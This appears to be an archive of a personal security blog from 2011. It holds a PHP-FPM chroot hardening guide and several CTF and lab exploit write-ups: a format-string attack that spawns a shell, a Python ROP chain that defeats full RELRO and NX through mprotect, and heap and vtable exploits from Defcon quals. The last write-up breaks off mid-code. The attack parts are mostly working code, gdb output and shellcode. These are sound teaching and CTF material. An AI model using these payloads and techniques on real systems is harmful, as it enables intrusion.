Sunday, October 16, 2011

Chroot PHP-FPM and Apache

As mentioned in "A Note on Security in PHP", the PHP security features (safe_mode, open_basedir, disable_functions) can be bypassed. Stefan Esser's paper also describes how to bypass them. A better alternative for PHP security is to chroot PHP-FPM.

With Google, you can easily find how to configure PHP-FPM for nginx, but I wanted the setup for Apache httpd. I found only these two: "Install Drupal in php-fpm (fastcgi) with Apache and a chroot php-fpm" and "The Perfect LAMP Stack – Apache2, FastCGI, PHP-FPM, APC". Both explain the FastCGI and PHP-FPM configuration very well, but only the first one describes how to chroot PHP, and its method is somewhat ugly. Why do I have to create a symlink?

After reading the Apache and PHP docs, I found the options. We just need to set "doc_root" to the web path as seen after chroot and "cgi.fix_pathinfo" to 0 in "php.ini". These options can also be set per PHP-FPM pool with the "php_admin_value" directive.


Updated on 11 Aug 2012

Note: I just noticed that the path-related $_SERVER variables are wrong if "cgi.fix_pathinfo" is 0. If a PHP application relies on these variables (such as $_SERVER["SCRIPT_FILENAME"] or $_SERVER["PATH_TRANSLATED"]), it will fail.

Another method is patching PHP-FPM. Here is my quick and dirty patch for PHP 5.3.15: http://pastebin.com/4EFqEgwE. I added a "cgi.fix_chrootpath" configuration option. Just set it to the same value as the "chroot" value in the pool configuration, and do not set "doc_root" or "cgi.fix_pathinfo". Ideally "cgi.fix_chrootpath" would be a boolean, but I could not find a way to access the "chroot" pool configuration. Lastly, I did not test the patch much. It works on my Linux box.
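The patch itself is not reproduced here, but the translation it has to perform is easy to picture: Apache hands over a script path as seen from outside the chroot, while the chrooted PHP-FPM worker has to open the same file relative to the chroot directory. Below is a minimal Python sketch of that mapping. It is an illustration only, not the patch; the function name and the example paths are hypothetical.

```python
import posixpath


def path_inside_chroot(script_filename, chroot_dir):
    """Translate a path seen outside the chroot to the path seen inside it.

    Raises ValueError when the script does not live under chroot_dir.
    """
    script = posixpath.normpath(script_filename)
    root = posixpath.normpath(chroot_dir)
    if root == "/":
        return script  # no chroot in effect, nothing to strip
    if script != root and not script.startswith(root + "/"):
        raise ValueError("script is outside the chroot: " + script)
    # Drop the chroot prefix; what remains is absolute inside the jail.
    return script[len(root):] or "/"


# Hypothetical example paths.
print(path_inside_chroot("/srv/jail/www/index.php", "/srv/jail"))
```

Rejecting paths outside the chroot, instead of passing them through, keeps a misconfigured vhost from silently pointing at the wrong file.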


Also, do not forget to remove the "FollowSymLinks" option or replace it with "SymLinksIfOwnerMatch" in the Apache httpd configuration. Otherwise, an attacker can use the symlink() trick to read any file that the web user can read.

After chrooting PHP, you might think open_basedir and disable_functions are useless. In my opinion, open_basedir is still useful. It can prevent PHP functions from reading files in "upload_tmp_dir" and "session.save_path", so an attacker cannot use temporary upload files or session files for LFI.

One last thing that only a few people mention: the noexec mount option can be used for the web data if the web application uses only PHP.

Tuesday, September 27, 2011

CSAW CTF 2011 - Exploitation Bin4 Writeup

After reading repnzscasb's Bin4 write-up, I had to ask myself, "why did I miss overwriting the function pointer?". Here is my solution (not a smart method to solve this challenge).

The challenge code is the same as bin3, but bin4 is compiled with full RELRO and ASLR is enabled. Here is a short version of the C code.

int s(char *op, char *lhs, char *rhs){
  static int(*opfunc)(int, int);
  int(*matfunc[4])(int, int) = {&add, &sub, &mul, &divi};
  char opmsg[512];

  op++;
  //...
 
  snprintf(opmsg, sizeof(opmsg), op);
  printf("%s\n", opmsg);
  fflush(0);
  return opfunc(atoi(lhs), atoi(rhs));
}
 
int main(int argc, char **argv){
 
  if(argc < 4){ u(); }
 
  printf("Result: %d\n", s(argv[2], argv[1], argv[3]));
  exit(EXIT_SUCCESS);
}

Assume we see only the format string bug (and do not see opfunc, a function pointer :P). The saved ebp in the s() stack frame points to the saved ebp in the main() stack frame. My idea is to use it with the format string bug to modify 1 byte of the saved ebp in the main() stack frame, so that it holds the address of the saved eip in the s() stack frame. Confused??? Look below.

(gdb) b *0x0804867e     # break at call snprintf
Breakpoint 1 at 0x804867e
(gdb) r 1 -%144\$hhn 2
Starting program: /home/worawit/csaw/bin4 1 -%144\$hhn 2
Operation:
Breakpoint 1, 0x0804867e in s ()
(gdb) x/12x $ebp
0xbffff648:     0xbffff668      0x08048721      0xbffff868      0xbffff866
0xbffff658:     0xbffff872      0x0029bff4      0x08048750      0x00000000
0xbffff668:     0xbffff6e8      0x00155e37      0x00000004      0xbffff714
(gdb) ni
0x08048683 in s ()
(gdb) x/12x $ebp
0xbffff648:     0xbffff668      0x08048721      0xbffff868      0xbffff866
0xbffff658:     0xbffff872      0x0029bff4      0x08048750      0x00000000
0xbffff668:     0xbffff600      0x00155e37      0x00000004      0xbffff714

Note:
- 0xbffff648 is address of saved ebp in s() stack frame
- 0xbffff64c is address of saved eip in s() stack frame
- 0xbffff668 is address of saved ebp in main() stack frame

From gdb, we can see that the saved ebp value in the main() stack frame has changed. If we change it to the address of the saved eip in the s() stack frame, 0xbffff64c, we can use it with the format string bug again to change the saved eip in the s() stack frame. That's the idea.

This method does not work every time because the stack address is randomized, but the chance is not low. In the low byte of the target address, only the upper 4 bits are random. The lower 4 bits are always the same because of the stack alignment in the main() function.
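To put a number on "not low": with 4 random bits, a single run hits the right byte with probability 1/16. A small sketch of how quickly a retry loop succeeds, assuming the 4 bits are uniformly random and each run is independent (both are assumptions, not measurements):

```python
def success_probability(random_bits, attempts):
    """Chance that at least one of `attempts` independent runs guesses right."""
    p_single = 1.0 / (1 << random_bits)
    return 1.0 - (1.0 - p_single) ** attempts


for n in (1, 16, 50):
    print("%d attempts: %.3f" % (n, success_probability(4, n)))
```

This is why a plain shell loop around the binary is enough to get a hit after a short wait.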

080486e5 <main>:
 80486e5:       55                      push   %ebp
 80486e6:       89 e5                   mov    %esp,%ebp
 80486e8:       83 e4 f0                and    $0xfffffff0,%esp

Because argv[1] is passed to the s() function as the 2nd argument, we just need to change the saved eip to the address of a pop/ret gadget, so that execution returns into argv[1], which holds the shellcode. I looked for one near 0x08048721, so that only 1 byte has to be modified.

worawit@nattyvm:~/csaw$ objdump -d ./bin4 | grep '^ 80487' | grep -B 1 ret
 8048743:       5d                      pop    %ebp
 8048744:       c3                      ret
--
 80487a8:       5d                      pop    %ebp
 80487a9:       c3                      ret
 80487aa:       8b 1c 24                mov    (%esp),%ebx
 80487ad:       c3                      ret
--
 80487d8:       5d                      pop    %ebp
 80487d9:       c3                      ret
--
 80487f6:       c9                      leave
 80487f7:       c3                      ret

I picked address 0x080487a8. The restriction of this method is that the "$" modifier must not be used in the first "%n". Otherwise the printf() function will not use the modified value. Here is the exploit. A shell will pop out in a second.

worawit@nattyvm:~/csaw$ while [ 1 ]; do ./bin4 `perl -e 'print "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"'` -`perl -e 'print "%8x"x142,"%220x%hhn","%8x"x6,"%44x%hhn"'` 10; done
...
$
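The two %hhn writes in the exploit can be checked by counting printed characters and consumed arguments. The sketch below is a simplified model that handles only the "%<width>x" and "%hhn" conversions, and assumes every "%<width>x" prints exactly <width> characters (true here, since a 32-bit value never needs more than 8 hex digits). The leading "-" of the argument is skipped by op++ in s(), so it is not part of the format string.

```python
import re


def hhn_writes(fmt):
    """Return (argument_index, byte_written) for every %hhn in fmt."""
    printed = 0  # characters emitted so far
    arg = 0      # variadic arguments consumed so far
    writes = []
    for width, is_n in re.findall(r"%(\d+)x|%(hhn)", fmt):
        arg += 1
        if is_n:
            # %hhn stores the low byte of the running character count.
            writes.append((arg, printed & 0xFF))
        else:
            printed += int(width)
    return writes


fmt = "%8x" * 142 + "%220x%hhn" + "%8x" * 6 + "%44x%hhn"
for arg, byte in hhn_writes(fmt):
    print("argument %d receives byte 0x%02x" % (arg, byte))
```

The first write goes through argument 144 (the same index as %144$hhn in the gdb session) and stores 0x4c, the low byte of the saved eip address 0xbffff64c in that run. The second write goes through argument 152, which is 8 dwords further up the stack (0xbffff668 - 0xbffff648 = 32 bytes), and stores 0xa8, the low byte of the chosen gadget 0x080487a8.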

Saturday, September 3, 2011

ROP with common functions in Ubuntu/Debian x86

After reading "How to make a ROP when gadgets seems to miss ? (kind of universal ROP under linux)", I saw something missing: it is hard to change the shellcode (to a connect-back one, for example) and it does not work on a full RELRO binary. So I tried to do ROP too (for fun) with the following code and compilation options on Ubuntu 10.04 (x86).

#include <string.h>
int main(int argc, char **argv)
{
    char buf[64];
    strcpy(buf, argv[1]);
    return 0;
}
$ gcc -fno-stack-protector -Wl,-z,relro,-z,now -o testfoo testfoo.c
$ checksec.sh --file testfoo
RELRO           STACK CANARY      NX            PIE                     FILE
Full RELRO      No canary found   NX enabled    No PIE                  testfoo

Here is the "objdump -d" output (testfoo_objdump.txt). I will paste only the gadgets here because the full output is very long.

In agix's work, he modified a GOT entry to get new gadgets. That cannot be done when full RELRO is enabled, but we can still use "call *%eax" (or similar) to make new gadgets.

Even when a binary is full RELRO, there is still memory at a static address with "rw" permission (at least the .data and .bss sections). When a binary file is mapped into memory, the memory is allocated in multiples of the page size (normally 4096 bytes). So in most cases, there is some unused memory that is initialized to zero. I will use this memory area to store some values.

Let's look at the gadgets in __libc_csu_init first.
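The size of that unused tail follows directly from the page rounding. A minimal sketch, where the end-of-.bss address is a hypothetical value picked for illustration (read the real one from the section headers of the target binary):

```python
PAGE_SIZE = 4096


def zero_slack(end_of_data, page_size=PAGE_SIZE):
    """Return (start, length) of the unused tail of the last rw page."""
    length = (-end_of_data) % page_size
    return end_of_data, length


# Hypothetical end of .bss.
start, length = zero_slack(0x0804A010)
print("free rw bytes from 0x%08x: %d" % (start, length))
```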

# gadget #1
 8048472:	83 c4 1c             	add    $0x1c,%esp
 8048475:	5b                   	pop    %ebx
 8048476:	5e                   	pop    %esi
 8048477:	5f                   	pop    %edi
 8048478:	5d                   	pop    %ebp
 8048479:	c3                   	ret 

This gadget can be used for setting ebx, esi, edi and ebp, and for cleaning up the stack.

# gadget #2
 8048439:	8d bb 0c ff ff ff    	lea    -0xf4(%ebx),%edi
 804843f:	8d 83 0c ff ff ff    	lea    -0xf4(%ebx),%eax
 8048445:	29 c7                	sub    %eax,%edi
 8048447:	c1 ff 02             	sar    $0x2,%edi
 804844a:	85 ff                	test   %edi,%edi
 804844c:	74 24                	je     8048472 <__libc_csu_init+0x52>

This gadget can be used for setting eax after setting ebx. The 0xf4 is the offset between _GLOBAL_OFFSET_TABLE_ and __init_array_start.

# gadget #3
 8048450:	8b 45 10             	mov    0x10(%ebp),%eax
 8048453:	89 44 24 08          	mov    %eax,0x8(%esp)
 8048457:	8b 45 0c             	mov    0xc(%ebp),%eax
 804845a:	89 44 24 04          	mov    %eax,0x4(%esp)
 804845e:	8b 45 08             	mov    0x8(%ebp),%eax
 8048461:	89 04 24             	mov    %eax,(%esp)
 8048464:	ff 94 b3 0c ff ff ff 	call   *-0xf4(%ebx,%esi,4)
 804846b:	83 c6 01             	add    $0x1,%esi
 804846e:	39 fe                	cmp    %edi,%esi
 8048470:	72 de                	jb     8048450 <__libc_csu_init+0x30>

This gadget can be used for calling a function, selected through ebx and esi, with 3 arguments. We need to set edi so that the jb condition fails. The limitation of this gadget is that we must know the address of the function arguments.

Next, gadgets in __do_global_ctors_aux

# gadget #4
 80484a7:	5b                   	pop    %ebx
 80484a8:	5d                   	pop    %ebp
 80484a9:	c3                   	ret  

This gadget can be used for setting ebx while using only a little stack space.

# gadget #5
(gdb) x/6i 0x0804849e
   0x804849e <__do_global_ctors_aux+30>:        add    -0xb8a0008(%ebx),%eax
   0x80484a4 <__do_global_ctors_aux+36>:        add    $0x4,%esp
   0x80484a7 <__do_global_ctors_aux+39>:        pop    %ebx
   0x80484a8 <__do_global_ctors_aux+40>:        pop    %ebp
   0x80484a9 <__do_global_ctors_aux+41>:        ret
   0x80484aa <__do_global_ctors_aux+42>:        nop

This gadget cannot be found in the objdump output. I used gdb to interpret the bytes at address 0x0804849e as instructions. It can be used for adding a value from memory to eax. Because we can control eax, it can be treated as loading a value from memory into eax (similar to a "mov (%ebx),%eax" instruction).

Next, gadgets in __do_global_dtors_aux.

# gadget #6
(gdb) x/3i 0x080483a9
   0x80483a9 <__do_global_dtors_aux+73>:        add    $0x804a008,%eax
   0x80483ae <__do_global_dtors_aux+78>:        add    %eax,0x5d5b04c4(%ebx)
   0x80483b4 <__do_global_dtors_aux+84>:        ret

This gadget can also be found with gdb, at address 0x080483a9. The "add %eax,0x5d5b04c4(%ebx)" instruction can be used for storing the eax value to memory if the value in memory is 0 (similar to "mov %eax,(%ebx)"). When we want to avoid badchars while setting eax, we use the whole gadget to adjust eax.

I also found this gadget in __do_global_dtors_aux with gdb.

(gdb) x/2i 0x08048392
   0x8048392 <__do_global_dtors_aux+50>:        add    %esp,0x804a00c(%ebx)
   0x8048398 <__do_global_dtors_aux+56>:        call   *0x8049ef8(,%eax,4)

It can be used for storing esp to memory. But because 0x804a00c (dtor_idx) is close to the static memory addresses, ebx has to be a very low value (0x0000????). I cannot find a gadget to adjust ebx, so we cannot use it if \x00 is a badchar (as in this example).

These are the 6 gadgets I use to do ROP. Here is my python code with the variable names for the gadget addresses.

from struct import pack

# start address of __do_global_dtors_aux
do_global_dtors_aux_addr = 0x08048360

# start address of __libc_csu_init
libc_csu_init_addr = 0x08048420
init_array_offset = 0xf4
bss_completed_addr = 0x0804a008

# start address of __do_global_ctors_aux
do_global_ctors_aux_addr = 0x08048480

set_eax_addr = libc_csu_init_addr + 0x19    # gadget #2
set_4reg_addr = libc_csu_init_addr + 0x55   # gadget #1
call_3args_addr = libc_csu_init_addr + 0x30 # gadget #3

set_ebx_addr = do_global_ctors_aux_addr + 0x27  # gadget #4
load_eax_addr = do_global_ctors_aux_addr + 0x1e # gadget #5

store_eax_addr = do_global_dtors_aux_addr + 0x4e  # gadget #6
store_eax_addr2 = do_global_dtors_aux_addr + 0x49 # can be used for avoiding badchars

JUNK = 0xbadc0de
JUNK_STR = pack("<I", JUNK)

Here is how I use these gadgets. Start with simply setting eax and ebx.

def do_set_ebx(ebx):
    # 12 bytes
    return pack("<III", set_ebx_addr, ebx, JUNK)

def do_set_eax_ebx(eax, ebx, esi=JUNK, edi=JUNK, ebp=JUNK):
    # (3+1+7+4)*4 = 60 bytes
    ebx_tmp = (eax + init_array_offset) & 0xFFFFFFFF
    return do_set_ebx(ebx_tmp) + pack("<I", set_eax_addr) + JUNK_STR*7 + pack("<IIII", ebx, esi, edi, ebp)
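Why do_set_eax_ebx works can be checked with a tiny register model of gadget #2. Both lea instructions compute the same value, so edi always ends up 0, the je is always taken, and execution lands on "add $0x1c,%esp" followed by the four pops of gadget #1. That is where the 7 junk dwords and the 4 register values in the chain come from. The sketch below models only these instructions; it is not an emulator.

```python
MASK = 0xFFFFFFFF
INIT_ARRAY_OFFSET = 0xF4


def run_gadget2(ebx):
    """Model gadget #2 and return (eax, edi, je_taken)."""
    edi = (ebx - INIT_ARRAY_OFFSET) & MASK  # lea -0xf4(%ebx),%edi
    eax = (ebx - INIT_ARRAY_OFFSET) & MASK  # lea -0xf4(%ebx),%eax
    edi = (edi - eax) & MASK                # sub %eax,%edi  -> always 0
    edi >>= 2                               # sar $0x2,%edi  -> still 0
    return eax, edi, edi == 0               # test/je


def ebx_for_eax(wanted_eax):
    """Value to pop into ebx so that gadget #2 leaves wanted_eax in eax."""
    return (wanted_eax + INIT_ARRAY_OFFSET) & MASK


eax, edi, taken = run_gadget2(ebx_for_eax(0xDEADBEEF))
print(hex(eax), edi, taken)
```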

Next is storing a value in memory, a common task.

def do_store_value(value, mem_addr):
    # 64 bytes
    eax = value
    ebx = (mem_addr - 0x5d5b04c4) & 0xFFFFFFFF
    return do_set_eax_ebx(eax, ebx) + pack("<I", store_eax_addr)
do_add_memref = do_store_value

def do_store_value2(value, mem_addr):
    # 64 bytes
    eax = (value - bss_completed_addr) & 0xFFFFFFFF
    ebx = (mem_addr - 0x5d5b04c4) & 0xFFFFFFFF
    return do_set_eax_ebx(eax, ebx) + pack("<I", store_eax_addr2)
do_add_memref2 = do_store_value2
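The arithmetic behind both store helpers can be verified with a small model of gadget #6 that uses a dict as memory. It also shows why the functions are aliased as do_add_memref: the gadget adds to memory, so it only acts as a store when the target word is zero. The target address below is hypothetical.

```python
MASK = 0xFFFFFFFF
DISP = 0x5D5B04C4           # displacement in "add %eax,0x5d5b04c4(%ebx)"
BSS_COMPLETED = 0x0804A008  # immediate in "add $0x804a008,%eax"


def preadjusted_eax(value):
    """eax to place on the stack when entering at store_eax_addr2."""
    return (value - BSS_COMPLETED) & MASK


def store_via_add(memory, value, mem_addr, adjust_eax=False):
    """Model gadget #6 on a dict that maps address -> 32-bit word."""
    ebx = (mem_addr - DISP) & MASK
    if adjust_eax:
        eax = (preadjusted_eax(value) + BSS_COMPLETED) & MASK
    else:
        eax = value & MASK
    target = (ebx + DISP) & MASK
    memory[target] = (memory.get(target, 0) + eax) & MASK
    return memory


mem = {}
store_via_add(mem, 7, 0x0804A100, adjust_eax=True)  # hypothetical address
print(hex(preadjusted_eax(7)), mem)
```

For the value 7 the pre-adjusted eax is 0xf7fb5fff, which contains no \x00 byte, while 7 itself could not be passed through strcpy.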

Before looking at the next functions, let's think about the goal first. I need the ROP to be reusable with other shellcode, so the goal is calling mprotect (I use mprotect because it requires only 3 arguments) and copying the shellcode into the rwx area. Looking at gadget #3, we need the 3 arguments in memory and the address of the function to be called in memory too. So we need to put the mprotect function address in memory. To find the mprotect address, we need to get a value from a GOT entry, then add/subtract an offset. Here is the function to do this task.

def do_store_func_addr(func_plt_got_addr, func_offset, mem_addr):
    # 80 bytes
    eax1 = (func_offset - bss_completed_addr) & 0xFFFFFFFF
    ebx1 = func_plt_got_addr + 0x0b8a0008  # normally got is in 0x08??????, so no overflow
    ebx2 = (mem_addr - 0x5d5b04c4) & 0xFFFFFFFF
    return do_set_eax_ebx(eax1, ebx1) + pack("<IIII", load_eax_addr, JUNK, ebx2, JUNK) + pack("<I", store_eax_addr2)
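The register arithmetic of do_store_func_addr can be traced step by step: eax starts as the offset minus 0x804a008, gadget #5 adds the GOT value, and the "add $0x804a008,%eax" at the start of store_eax_addr2 cancels the initial subtraction. A minimal model follows; the GOT slot address and both libc addresses are hypothetical values chosen for illustration.

```python
MASK = 0xFFFFFFFF
LOAD_DISP = 0x0B8A0008      # gadget #5: add -0xb8a0008(%ebx),%eax
BSS_COMPLETED = 0x0804A008  # store_eax_addr2: add $0x804a008,%eax


def resolve_via_got(memory, got_addr, func_offset):
    """Return the eax value that ends up being stored to memory."""
    eax = (func_offset - BSS_COMPLETED) & MASK             # eax1
    ebx = (got_addr + LOAD_DISP) & MASK                    # ebx1
    eax = (eax + memory[(ebx - LOAD_DISP) & MASK]) & MASK  # gadget #5
    eax = (eax + BSS_COMPLETED) & MASK                     # add $0x804a008,%eax
    return eax


# Hypothetical addresses.
GOT_SLOT = 0x08049FF4
REF_FUNC = 0xB7E9C2B0  # resolved address stored in the GOT slot
MPROTECT = 0xB7F0E0E0  # where mprotect would be in the same libc

memory = {GOT_SLOT: REF_FUNC}
print(hex(resolve_via_got(memory, GOT_SLOT, MPROTECT - REF_FUNC)))
```

Because everything is done modulo 2^32, a negative offset (target function before the reference function) works the same way.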

The last function is for calling a function with 3 arguments.

def do_call_3arg(func_mem_addr, args_mem_addr):
    esi = 0x02020202
    ebx = (func_mem_addr + init_array_offset - (esi*4)) & 0xFFFFFFFF
    ebp = args_mem_addr - 8
    edi = 0x01010101  # to make jb condition fail
    return pack("<IIIII", set_4reg_addr, ebx, esi, edi, ebp) + pack("<I", call_3args_addr) + JUNK_STR*11
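The register values chosen in do_call_3arg can be checked against the two instructions that matter in gadget #3: the indirect call and the loop condition. After the call returns and the jb falls through, execution reaches "add $0x1c,%esp" and the four pops, which is why 11 junk dwords follow (7 skipped by the add, 4 popped). A sketch with a hypothetical function-pointer address:

```python
MASK = 0xFFFFFFFF
INIT_ARRAY_OFFSET = 0xF4


def call_target(ebx, esi):
    """Address read by: call *-0xf4(%ebx,%esi,4)."""
    return (ebx - INIT_ARRAY_OFFSET + esi * 4) & MASK


def loops_again(esi, edi):
    """True when 'add $0x1,%esi; cmp %edi,%esi; jb' would jump back."""
    return ((esi + 1) & MASK) < edi  # jb is an unsigned comparison


func_mem_addr = 0x0804A100  # hypothetical slot that holds the function address
esi, edi = 0x02020202, 0x01010101
ebx = (func_mem_addr + INIT_ARRAY_OFFSET - esi * 4) & MASK
print(hex(ebx), hex(call_target(ebx, esi)), loops_again(esi, edi))
```

The odd-looking constants 0x02020202 and 0x01010101 are simply values without \x00 bytes that still satisfy both conditions.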

We have all the functions. Time to assemble them to call mprotect.
Note: I have to store the mprotect arguments in memory first because they always contain a \x00 byte (a badchar in this example).

rop = ""
# prepare mprotect address and its arguments in static memory
rop += do_store_func_addr(libc_ref_func_got, mprotect_offset, static_mem_zero_start)  # mprotect address in libc
rop += do_store_value(static_mem_rw_start, static_mem_zero_start + 8)
rop += do_store_value2(mprotect_len, static_mem_zero_start + 12)
rop += do_store_value2(7, static_mem_zero_start + 16)  # rwx
# call mprotect
rop += do_call_3arg(static_mem_zero_start, static_mem_zero_start + 8)

After getting memory with rwx permission, there are many ways to execute any shellcode. I inject a gadget that sets the strcpy src address on the stack.

# metasm > lea eax,[esp+0x10]
# "\x8d\x44\x24\x10"
# metasm > mov [esp+0xc],eax
# "\x89\x44\x24\x0c"
# metasm > ret
# "\xc3"
rop += do_store_value(0x1024448d, static_mem_zero_start + 20)
rop += do_store_value(0x0c244489, static_mem_zero_start + 24)
rop += do_store_value(0x909090c3, static_mem_zero_start + 28)
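The three constants passed to do_store_value are just the stub bytes read as little-endian dwords, with NOP padding after the ret. A short sketch that derives them from the machine code (Python 3 bytes, unlike the Python 2 strings in the post):

```python
import struct

# lea eax,[esp+0x10] ; mov [esp+0xc],eax ; ret
STUB = b"\x8d\x44\x24\x10" + b"\x89\x44\x24\x0c" + b"\xc3"


def to_dwords(code, pad=b"\x90"):
    """Pad code to a multiple of 4 bytes and return little-endian dwords."""
    code += pad * (-len(code) % 4)
    return list(struct.unpack("<%dI" % (len(code) // 4), code))


print([hex(d) for d in to_dwords(STUB)])
```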

Then I use strcpy@plt to copy the shellcode and jump to it.

rop += pack("<IIIII", static_mem_zero_start + 20, strcpy_plt, static_mem_zero_start + 32, static_mem_zero_start + 32, JUNK)
rop = "A"*64 + pack("<I", ret_addr)*5 + rop + shellcode

Here is my full python code: genrop.py. Now we can change the shellcode easily :).

$ python genrop.py
$ ./testfoo "`cat rop.out`"

I also tried it on Ubuntu 11.04 and Debian 6. It works. But on Fedora 14/15, __do_global_dtors_aux is slightly different. Gadget #6 is changed to use ecx and ebp for storing a value in memory, and I cannot find any gadget to control ecx. I think we can use gadgets in libc by using "call *%eax". It is harder but still possible.

Saturday, June 11, 2011

Defcon 19 Quals - Pwntent Pwnables 500 Writeup

I could not solve this challenge in time. It is definitely a good challenge (and hard).

The binary is compiled from C++ code and stripped. Even though the binary is dynamically linked, we see many functions in the assembly because some C++ STL code is included in the binary. From the objdump output, the binary was compiled on Fedora 14, so I tested my exploit only on Fedora 14. Here is the output of some checks.

$ file pp500_e98c4e1c448e706a94e
pp500_e98c4e1c448e706a94e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped
$ strings pp500_e98c4e1c448e706a94e
...
_ZSt29_Rb_tree_insert_and_rebalancebPSt18_Rb_tree_node_baseS0_RS_
...
vector::_M_insert_aux
...
$ objdump -s -j .comment pp500_e98c4e1c448e706a94e

pp500_e98c4e1c448e706a94e:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 2028474e 55292034 2e352e31  GCC: (GNU) 4.5.1
 0010 20323031 30303932 34202852 65642048   20100924 (Red H
 0020 61742034 2e352e31 2d342900           at 4.5.1-4).
$ checksec.sh --file pp500_e98c4e1c448e706a94e
RELRO           STACK CANARY      NX            PIE                     FILE
No RELRO        No canary found   NX enabled    No PIE                  pp500_e98c4e1c448e706a94e

Assembly generated from C++ code is very difficult to understand at first sight. A good way to understand it (for me) is writing simple C++ code that uses std::string, then compiling it and viewing the assembly (without stripping). Here is my C++ code for learning std::string: teststring.cpp.

After understanding std::string in assembly, reading the assembly code is a lot easier. There are still many unknown functions. But I could at least understand the program flow.

In the upload_new_record function, there is a call to "new" after receiving the data from the client. I guessed that the functions called after "new" are class constructors. Both constructors call the same function, which is the parent constructor. I could also see the vtable in the constructors.

I named the classes RecordOdd and RecordEven (after the random value checked before creating the Record object). Inside RecordEven::setBuffer, there is an overflow bug. The buffer is allocated with 224 bytes but the function always writes 248 bytes. I thought of using it to overwrite the vtable of the adjacent record, so I just needed to find a way to trigger it. I guessed almost immediately that setBuffer is called when we edit a record. But that is not enough because it causes heap corruption.

There are some messy functions. I could only guess that they are STL functions and that their object is in the .bss section. I saw "vector" and "Rb_tree" in the strings, so the program must use std::vector and some kind of STL container that uses a red-black tree as its internal data structure. Again, I wrote simple C++ code for each container. The binary uses std::map. Here is my C++ code: testmap.cpp

Once I knew the program uses std::map to store the Records with an object id as the key, it was not difficult to reverse the remaining code. Here is my reversed C++ code: pp500_code.cpp

Exploitation

I looked at the memory while doing "upload new record". I found that there is some red-black tree data after a new record. If I used the overflow bug, I would overwrite the red-black tree data, not the vtable of the next record.

It might be possible to overwrite the red-black tree data in order to modify the pointer to a Record and make it point to a fake vtable area, but I think that is difficult to do. IMHO, playing with heap chunks is easier.

To make a Record allocated right after another Record without any data in between, I upload a new record and delete it to make a hole (free chunk). Then I upload another record to lock the hole. The heap layout after these steps should look like this (heap metadata omitted).

---+------------+--------------+-----------
   | free chunk |   Record 1   |           
---+------------+--------------+-----------

The "free chunk" should be big enough for many red-black tree nodes but too small for a Record, so a new Record will be allocated next to Record 1.

I need a RecordEven object to be able to overwrite the vtable of the next Record. I loop over "upload new record", "view record" and "delete record" (if it is not a RecordEven) until I get a RecordEven object. Now I can modify the vtable pointer :). The remaining problem is finding the address of the Record that contains the fake vtable.

In the "edit_record" function, the received data is copied to the Record buffer. The received length is ignored. RecordOdd::setBuffer() uses the length defined at "upload new record" time to determine how much data to copy. So if we can make the receive buffer in "edit record" contain a heap address, the program will copy the address to the RecordOdd buffer. Then we can get the address from "view record". (I do not use RecordEven::setBuffer() because it causes heap corruption.)

In the "upload_new_record" function, there is a pointer to the new Record. It lies within the buffer space of the "edit_record" function, so we can copy the pointer to a newly uploaded Record into the RecordOdd data.

When overwriting the vtable, we also need to put correct heap metadata (only the chunk size) to prevent heap corruption. Lastly, I use the "edit_record" function to trigger the exploit because it receives data from the client into a buffer before calling the function from the fake data, so I put the ROP data on the stack.

The remaining part is doing ROP. Here is my exploit to get a shell: pp500.py (Note: you need to copy "/bin/sh" and the needed libraries into the pwn400 home directory because the program does chroot.)

I also wrote an exploit that just reads the "key" file. It does not need to know the function offsets in libc: pp500_readkey.py

$ python pp500_readkey.py
creating a hole ...
!!! Got odd record, it might be failed !!!

creating a record to lock the hole ...

creating third record...
getting the Record address...
08fb50e4,08fb5024,00000001,d06a93c2,08fb52d8,43434344

Record address: 08fb5100

overwriting vtable...
trigger the exploit

sending key
waiting for key

dummy key for testing       áP8PÇO♥           XáN N√

Wednesday, June 8, 2011

Defcon 19 Quals - Pwntent Pwnables 400 Writeup

As usual, I checked the file first.

$ file pp400_804703cc7f7d5d3f54ba
pp400_804703cc7f7d5d3f54ba: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
$ objdump -s -j .comment pp400_804703cc7f7d5d3f54ba

pp400_804703cc7f7d5d3f54ba:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 2028474e 55292034 2e362e30  GCC: (GNU) 4.6.0
 0010 20323031 31303530 39202852 65642048   20110509 (Red H
 0020 61742034 2e362e30 2d372900 4743433a  at 4.6.0-7).GCC:
 0030 2028474e 55292034 2e362e30 20323031   (GNU) 4.6.0 201
 0040 31303230 35202852 65642048 61742034  10205 (Red Hat 4
 0050 2e362e30 2d302e36 2900               .6.0-0.6).

The binary in this challenge is statically linked and stripped. It means all libc functions are included in the binary and symbol names are stripped. From the comment section, the binary appears to have been compiled on Fedora 15. I tried to create an IDA sig file from "libc.a" but no function names were resolved. So I had to reverse the code manually.

My trick for reversing the code in this challenge is starting from "/dev/urandom". The function that is passed "/dev/urandom" as its first argument should be "open". If we follow the assembly code in the "open" function, we see it setting eax to SYS_OPEN and then jumping to "__unified_syscall" (see my pCTF - Another Small Bug writeup). So we can recover the names of many libc functions that set eax to a syscall number.

The remaining libc functions are not difficult to guess if we know the function arguments and which syscall is called inside the function. The code I got is the same as in LeetMore's writeup, but they use better variable names than me (so read their code).

From the code, the program copies client data over the saved eip address, but there is a length limit. Before thinking about how to make the payload small, I checked the security features enabled in the binary.

$ checksec.sh --file pp400_804703cc7f7d5d3f54ba
RELRO           STACK CANARY      NX            PIE                     FILE
No RELRO        No canary found   NX disabled   No PIE                  pp400_804703cc7f7d5d3f54ba

NX is disabled, so I do not need to do full ROP. I just put in code that reads the shellcode into some static rwx area (with "fread") and then jumps to it. We can also see from the code that stdin and stderr are the connected socket, so we just need the execve("/bin/sh") shellcode.

fread_addr = 0x08048c60
stdin_addr = 0x0804a31c
wx_addr = 0x0804a480

payload = pack("<I", fread_addr) # jump to fread
payload += pack("<I", wx_addr)   # jump to shellcode
payload += pack("<IIII", wx_addr, 1, len(sc), stdin_addr) # fread arguments
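The same 24 bytes can be written as a labelled layout, which makes it easier to see how the stack is consumed: the overwritten saved eip enters fread, the next dword becomes fread's return address, and the following four dwords are its cdecl arguments. This is a self-contained restatement in Python 3; the shellcode length used below is a placeholder, not the length of the real shellcode.

```python
from struct import pack, unpack

fread_addr = 0x08048c60
stdin_addr = 0x0804a31c
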